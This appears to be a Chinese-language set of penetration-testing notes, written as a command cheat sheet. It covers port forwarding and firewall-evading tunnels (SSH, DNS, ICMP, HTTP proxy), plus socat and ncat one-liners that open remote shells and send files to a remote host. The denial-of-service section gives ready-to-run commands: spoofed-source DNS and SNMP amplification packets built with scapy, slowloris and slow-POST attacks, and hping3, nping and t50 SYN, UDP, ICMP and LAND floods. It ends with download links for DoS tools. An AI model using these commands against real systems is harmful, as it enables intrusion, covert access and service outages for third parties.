Rinetd重定向
1. 安装rinetd:apt-get install rinetd
2. 配置:/etc/rinetd.conf文件中输入bindadd bindport connectadd connectport4个参数即:侦听主机ip,侦听端口,转发主机,转发端口
3. 运行:rinetd:
a) 查看运行进程:ps aux | grep rinetd,
b) 杀掉进程:pkill rinetd,
c) 查看端口:netstat –pantu | grep :53.
SSH本地端口转发
1. 修改配置文件,可使用root账号,更改/etc/ssh/sshd_config文件。
–PermitRootLogin yes
– Port 53
– PasswordAuthentication yes
2.本地 启动SSH侦听:service ssh start,查看53端口:netstat –pantu | grep :53
▪ ssh -fCNg -L <listen port>:<remote ip>:<remote port> user@<sshserver> -p <ssh server port>
▪ ssh -fCNg -L <listen port>:localhost:<remote port> user@<sshserver> -p <ssh port>
SSH远程端口转发
1. 远程服务器开启SSH,开启侦听:
a) ▪ ssh -fNg -R <listen port>:<remote ip>:<remote port> user@<SSH server> -p
<ssh server port>
协议隧道(穿透防火墙)
1. dns2tcpd隧道,修改服务端配置文件:/etc/dns2tcpd.conf
Listen = 0.0.0.0 , port = 53 , user = nobody, chroot = /tmp , key = password123 , domain=test.lab.com,resources = ssh:127.0.0.1:22,smtp:127.0.0.1:25,socks:127.0.0.1:1082,https:127.0.0.1:8087,http:127.0.0.1:3128
2. 服务器启动命令:dns2tcpd –F –d 1 –f /etc/dns2tcpd.conf
3. 客户端通过使用不同协议连接服务器如SSH连接命令: dns2tcpc -c -k pass -d 1 -l 2222 -r ssh -z test.lab.com 会被服务端dns2tcpd.conf配置文件中配置的resources重定向到服务器指定的22端口转发。
4. iodine隧道:
a) 方法一:
i. 创建服务端隧道网卡:iodined –f –c 10.0.0.1 test.lab.com
ii. 客户端连接隧道:iodine –f test.lab.com
iii. 使用ping 10.0.0.1是否通过防火墙建立连接。
iv. 使用ssh连接:ssh -CfNg -D 7001 root@10.0.0.1
b) 方法二:
i. 服务端安装tap网卡驱动: https://openvpn.net/index.php/open-source/downloads.html
ii. Widows客户端: – http://code.kryo.se/iodine/ – iodine -f test.lab.com
5. Ncat功能:
a) 代理:ncat -l 8080 --proxy-type http --proxy-auth user:pass
b) 连接broker方式: 服务端:ncat -l 333 –broker 客户端:ncat 1.1.1.1 --sh-exec "echo `pwd`“
c) 文件传输:ncat --send-only 1.1.1.1 333 < inputfile
6. Socat功能:
a) 远程shell获取: 服务端: socat tcp-l:23 exec:sh,pty,stderr 客户端 连接端口获取shell:Socat - tcp:1.1.1.1:23
b) 远程执行命令:
i. 服务器:socat - udp-l:2001
ii. 客户端:echo “`id`” | socat - udp4-datagram:1.1.1.1:2001
c) 端口转发:socat tcp4-listen:22,fork tcp4:1.1.1.1:22
d) 连接端口:Socat - tcp:1.1.1.1:80
e) 侦听端口:socat - tcp4-listen:22 / socat - tcp-l:333
f) 发送文件:cat 1.txt | socat - tcp4:1.1.1.1:333
g) 接受文件:socat tcp4-listen:333 open:2.txt,creat,append
h) Udp全端口任意内容发包: 命令:for PORT in {1..65535}; do echo “aaaaa" | socat - UDP4-DATAGRAM: 1.1.1.1:$PORT; sleep .1; done
命令:echo “’id’” |socat – udp-datagram:192.168.0.110:2000
i) 二进制编辑器: echo -e "\0\14\0\0\c" | socat -u - file:/usr/bin/ squid.exe,seek,seek=0x00074420
j) 简单的web服务器: socat -T 1 -d -d TCP-L:10081,reuseaddr,fork,crlf SYSTEM:"echo -e \"\\ \"HTTP/1.0 200 OK\\\nDocumentType: text/plain\\\n\\\ndate: \$\(date\)\\ \nserver:\$SOCAT_SOCKADDR:\$SOCAT_SOCKPORT\\\nclient: \ $SOCAT_PEERADDR:\$SOCAT_PEERPORT\\\n\\\"\"; cat; echo -e \"\\\"\\\n\ \\"\""
7. Ptunnle命令,通过ping实现隧道:
a) 服务器:ptunnel -x 1234
b) 客户端:sudo ptunnel -p proxy -lp 2222 -da destination -dp 22 -x 1234
c) 嵌套SSH隧道:ssh -CNfg -D 7000 root@127.0.0.1 -p 2222
8. Proxytunnle命令:
方法一: 1.内网安装squid3代理、proxytunnle: vi /etc/squid3/squid.conf /^http_port /^http_access /^ac 2. 创建隧道:proxytunnle -a 80 -p 127.0.0.1:3128 -d 192.168.1.1:80
方法二:
1. 外网安装squid3代理服务器并侦听80端口:
2. 创建隧道:proxytunnle -a 80 -p 127.0.0.1:3128 -r 192.168.1.1:80 -d 192.168.1.1:22
方法三:
1. SSH客户端配置自动创建代理: vi ~/.ssh/config Host 192.168.1.1 Hostname 192.168.1.1 ProtocolKeepAlives 30 ProxyCommand /usr/bin/proxytunnel -p 1.1.1.1:3128 -r 192.168.1.1:80 -d %h:%p
9. sslh端口分配器:vim /etc/default/sslh, RUN-yes DAEMON=/usr/sbin/sslh DAEMON_OPTS=”--user sslh --listen 1.1.1.10:443 --ssh 127.0.0.1:22 --ssl 1.1.1.11:443 --http 127.0.0.0:80 --pidfile /var/run/sslh/sslh.pid”
10. stunnel4服务器: a) 生成证书:openssl req -new –days 365 -nodes -x509 -out /etc/stunnel/ stunnel.pem -keyout /etc/stunnel/stunnel.pem b) 创建配置文件:
i. cert = /etc/stunnel/stunnel.pem
ii. ▪ setuid = stunnel4
iii. ▪ setgid = stunnel4
iv. ▪ pid = /var/run/stunnel4/stunnel4.pid
v. ▪ [mysqls]
vi. ▪ accept = 0.0.0.0:443
vii. ▪ connect = 1.1.1.11:3306
c) 自动启动:– /etc/default/stunnel4,▪ ENABLED=1
d) 启动stunnel4服务端:service stunnel4 start
e)客户端配置(kali自带):
创建配置文件:/etc/stunnel/stunnel.conf
▪ client = yes
▪ [mysqls]
▪ accept = 3306
▪ connect = 192.168.1.11:443
f)客户端自启:/etc/default/stunnel4,▪ ENABLED=1
g)启动客户端:– service stunnel4 stop / start
流量攻击DOS
1. 发送ip数据包:
a) scapy,i=IP(),i.dst=’192.168.0.119’,t=TCP(),t.dport=22,sr1(i/t,verbose=1,timeout=2)
2. 抓包工具wireshark过滤抓包:ip.addr eq 192.168.0.111
3. DOS攻击:通过发送请求3次握手建立连接,使用iptables规则丢弃对方响应数据包从而达到对方保持短时间持续连接占用资源的效果。 iptables -A OUTPUT -p TCP --tcp-flags rst rst -d 1.1.1.1 -j DROP
4. DNS攻击:通过向dns发送数据包访问各种服务器,将数据包响应地址改为目标主机ip。通过响应数据包堵死目标主机。 Scapy构造数据包: i=IP() i.dst="202.106.0.20" i.src="1.1.1.1" i.display() u=UDP() u.display() u.dport d=DNS() d.rd=1 d.qddount=1 d.display() q=DNSQR() q.qname='hp.com' q.qtype=255 q.display() d.qd=q d.display() r= (i/u/d) r.display() r sr1(r) send(r)
5. Snmp网络协议管理站攻击:通过向snmp服务端发送数据包请求,伪造源地址,snmp响应给攻击目标。到达攻击效果。 i=IP() i.dst=“1.1.1.1" i.display() u=UDP() u.dport=161 u.sport=161 s=SNMP() s.community= 'public' s.display() b=SNMPbulk() b.display() b.max_repetitions = 100 b.varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1')), SNMPvarbind(oid=ASN1_OID(' 1.3.6.1.2.1.19.1.3'))] s.PDU=b snmp.display() r= (i/u/s) r.display() Sr1(r) send(r)
6. 通过时间服务器发动攻击: 查看开发ntp端口: nmap -sU -p123 1.1.1.1 / 127.0.0.1 发现漏洞: ntpdc -n -c monlist 1.1.1.1 ntpq -c rv 1.1.1.1 ntpdc -c sysinfo 192.168.20.5 开启ntp服务(注释掉):/etc/ntp.conf restrict -4 default kod nomodify notrap nopeer noquery restrict -6 default kod nomodify notrap nopeer noquery
7. 应用层dos慢速攻击:最大并发ulimite -n 70000,apt-get install slowhttptest, http post攻击模式:slowhttptest -c 1000 -B -g -o body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://1.1.1.1 -x 10 -p 3 slowloris攻击模式:slowhttptest -c 1000 -H -g -o header_stats -i 10 -r 200 -t GET -u http:// 1.1.1.1 -x 24 -p 3
8. Hping3攻击:可以定制发送任何tcp/ip数据包。 Syn flood攻击: hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 1.1.1.1 hping3 -S -P -U -p 80 --flood --rand-source 1.1.1.1 hping3 -SARFUP -p 80 --flood --rand-source 1.1.1.1 (TCP FLOOD)ICMP Flood攻击:hping3 -q -n -a 1.1.1.1 --icmp -d 56 --flood 1.1.1.2 UDP Flood攻击:hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood 1.1.1.2 LAND攻击:hping3 -n -a 1.1.1.1 -S -d 100 -p 80 --flood 1.1.1.1 TCPDos攻击:nping --tcp-connect --rate=10000 -c 1000000000 -q 1.1.1.1 查公网IP:nping --echo-client "public" echo.nmap.org –udp
9. Siege(压力测试http/https)工具:模拟多个用户请求。 siege -g http://1.1.1.1/a.php / 1.1.1.1 siege -i -c 1000 ▪ /etc/siege/urls.txt(-f参数指定字典)
10. T50 网络压力测试: t50 1.1.1.1 --flood --turbo -S --protocol TCP --dport 80 t50 1.1.1.1 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22
11. 匿名者(拒绝服务攻击组织)发布的DOS工具:LOIC 、 HOIC 、 DDoSer、DDOSIM、GoldenEye 其他拒绝服务工具:XOIC 攻击任意IP地址的指定端口: – git clone git://git.code.sf.net/p/xoic/code xoic-code – https://xoicdoser.wordpress.com/ – 三种模式:test、normal、Dos Attack – 支持协议:TCP/HTTP/UDP/ICMP HULK - Http Unbearable Load King: – https://packetstormsecurity.com/files/download/112856/hulk.zip